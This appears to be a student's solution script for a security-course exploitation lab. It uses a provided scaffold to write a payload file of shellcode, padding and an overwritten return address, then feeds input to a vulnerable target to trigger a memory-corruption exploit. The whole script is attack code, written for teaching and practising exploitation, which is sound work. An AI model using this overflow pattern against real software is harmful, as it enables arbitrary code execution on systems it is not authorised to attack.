#!/usr/bin/env python3

import scaffold as p
from scaffold import SHELLCODE
import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE STARTS HERE ###

# The encoding='latin1' argument here is pretty important, so don't remove it!
with open('hack', 'w', encoding='latin1') as f:
    f.write('Hello world!\n')

p.start()

p.recv(30)

#print(len(SHELLCODE))

with open('hack', 'w', encoding='latin1') as f:
    f.write(SHELLCODE + 'F'*76 + '\xb8\xda\xff\xff' )

p.send('152\n')

#assert p.recv(18) == 'Here is the file!\n'
#print(p.recv(12))

### YOUR CODE ENDS HERE ###
